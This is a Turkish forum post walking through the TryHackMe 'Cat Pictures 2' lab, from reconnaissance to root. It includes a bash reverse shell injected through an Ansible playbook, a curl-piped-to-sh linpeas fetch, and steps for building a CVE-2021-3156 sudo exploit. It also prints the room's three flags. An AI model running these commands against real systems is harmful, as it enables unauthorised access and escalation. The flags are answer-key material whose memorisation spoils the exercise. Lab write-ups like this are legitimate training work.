Neler yeni
Bughane Academy

Bughane Academy, bug bounty, web güvenliği ve sızma testi alanında kendini geliştirmek isteyenler için kurulmuş Türkçe odaklı bir topluluktur.

Burada; gerçek güvenlik açıkları, recon ve exploit teknikleri, payload & bypass yöntemleri, araçlar, scriptler ve write-up’lar topluluk tarafından paylaşılır ve tartışılır.

Birlikte öğren, birlikte üret, birlikte güçlen.

TryHackMe Cat Pictures2 WriteUp

omertugrulbayram

Moderator
Araştırmacı
Katılım
2 Ocak 2026
Mesajlar
38
Tepkime puanı
46
Puan
18
Merhaba arkadaşlar, bugün TryHackMe platformu üzerinde bulunan Cat Pictures2 odasını çözeceğiz. Vpn bağlantısı yapıp makinemizi başlatarak çözmeye başlıyoruz.
İlk olarak VPN’i bağlıyoruz ve sonrasında bilgi toplamak için Nmap aracını kullanacağız. nmap -A [ip adresi] komutunu kullanıyorum.
1769178333119.jpg


1769178318905.jpg

1769178306886.jpg

80 portunun 22 portunun ve 3000 portunun açık olduğunu görüyoruz 80 portu açık ise tarayıcımıza ip adresini yapıştırarak başlayalım.
1769178383175.jpg
İp adresimizi yapıştırdığımızda bizi böyle ekran karşılıyor buradan albüme tıklayarak bakacağız.
1769178423698.jpg
Albümden ilk fotoğrafı indiriyoruz ve sonrasında exiftool [dosyanınadı.jpeg] komutuyla meta datalarına bakacağız.
1769178463586.jpg
Burada Title başlığı altında bir txt dosyası görüyoruz.
1769178491106.jpg
Gördüğünüz gibi bize giteaya girmek için kullanıcı adı şifre ve not vermiş.
1769178516603.jpg
Bize verilen ip adresimize [ip adresi]:3000 bunu browsera yapıştırarak Gitea’ya gidiyoruz ve sağ üstte bulunan Sign İn butonuna basıp bize verilen kullanıcı adı şifre ile giriş yapacağız.
1769178562731.jpg
Giriş yaptığımız zaman bir projeyle karşılaşıyoruz.
1769178585329.jpg
Bu dosyalarda adındanda anlaşıldığı gibi flag1.txt dosyasını okuyup ilk flagimizi alıyoruz.
FLAG: 10d916eaea54bb5ebe36b59538146bb5
Şimdi 1337 numaralı porta bakacağız. bize nottada 1337. portu söylemişti

1769178661967.jpg

Bizi böyle bir ekran karşılıyor Burada Run Ansible Playblock’a tıklayıp git ekranında playbook.yml dosyasında değişiklik yaptığımda burayı etkilediğini gördüm mesela şuan bastığımda waitin ekranı görürken playbook.yml dosyasında yanlış bir kod yazdığım zaman
1769178699728.jpg
Gördüğünüz gibi Exit code verip bizi atıyor. Bundan yararlanarak reverseshell almaya çalışacağız. playbook.yml dosyasındaki command kısmına revsheels.com’da bulduğumuz komutu yapıştıracağız.
1769178734090.jpg
command kısmına kodumuzu koyduk.

bash -c "bash -i >& /dev/tcp/[ip] /9000 0>&1"

terminalinize ifconfig yazın ve tun0'ın altındaki ip adresini giriniz.
1769178773791.jpg
Ardından netcat ile dinlemeye alıyoruz ve son olarak dosyamızı kaydediyoruz ve sitedeki Run Ansible Playbook tuşuna basıyoruz.
1769178815550.jpg
Ve shell’i almış olduk buradanda 2.Flagi buluyoruz.
1769178839059.jpg
FLAG2: 5e2cafbbf180351702651c09cd797920
1769178863764.jpg

Şimdi http server açıyoruz yetki yükseltme yapacağız ve aynı zamanda yetki yükseltme için linpeas.sh kullanacağız.

curl -L http://[ipadresi]:3000/linpeas.sh | sh
komutunu terminale yapıştırıyoruz
1769179353326.jpg
Ve zaafiyetli bir sudo sürümünün çalıştığını görüyoruz Alttaki repoyu kullanacağız o yüzden git clone ile bunu alıyoruz
Şimdi zaafiyeti göndermek için sıkıştırıyoruz,

tar -cvf exploit.tar CVE-2021-3156
Ardından tekrar python serveri başlatıyoruz.
python3 -m http.server
Ve buradayken exploiti atıyoruz.
1769179454867.jpg
cd diyerek klasöre girip komut satırına make yazıyoruz ardından ./exploit yazıyoruz.

1769179518861.jpg

Ve flagi almış olduk :)

FLAG3: 6d2a9f8f8174e86e27d565087a28a971
 
Geri
Üst